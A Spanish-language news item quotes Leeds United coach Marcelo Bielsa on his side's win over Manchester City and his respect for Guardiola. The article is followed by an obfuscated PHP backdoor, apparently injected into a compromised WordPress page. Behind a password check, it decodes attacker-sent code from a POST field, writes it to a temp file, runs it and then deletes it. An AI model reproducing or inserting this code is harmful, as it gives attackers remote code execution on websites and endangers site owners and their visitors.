Bielsa: “Merecimos ganar, pero lo justo era que ganara el City”

Foto: Leeds United

Marcelo Bielsa evidenció una sensación ambigua después del resonante triunfo que logró su Leeds United frente al líder de la Premier League inglesa, Manchester City.

El técnico rosarino, que no pudo borrar de su rostro una sonrisa durante su contacto con la prensa posterior al encuentro, afirmó: “Hay dos palabras que es difícil que funcionen en común. Merecimos ganar, pero lo justo hubiera sido que ganara el City”.

“Es muy difícil, pero es lo que pienso”, justificó Bielsa su postura, con una felicidad imposible de disimular.

Además, indicó: “Hicimos un esfuerzo muy grande, pero es cierto que City dominó el juego y tuvo las mejores opciones”.

“Fue un partido que si nosotros no tenemos un grado muy alto de agresividad, nos cuesta abreviar la diferencia que hay entre la capacidad creativa de City y la nuestra”, explicó Bielsa, cuyo equipo aprobó esta mañana un duro examen.

Por otro lado, sobre el entrenador de Manchester City, con quien lo une una admiración mutua, manifestó: “Yo no le gané a Guardiola, es un partido entre dos equipos. Somos los dos entrenadores, de los equipos que jugaron hoy, simplemente”.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}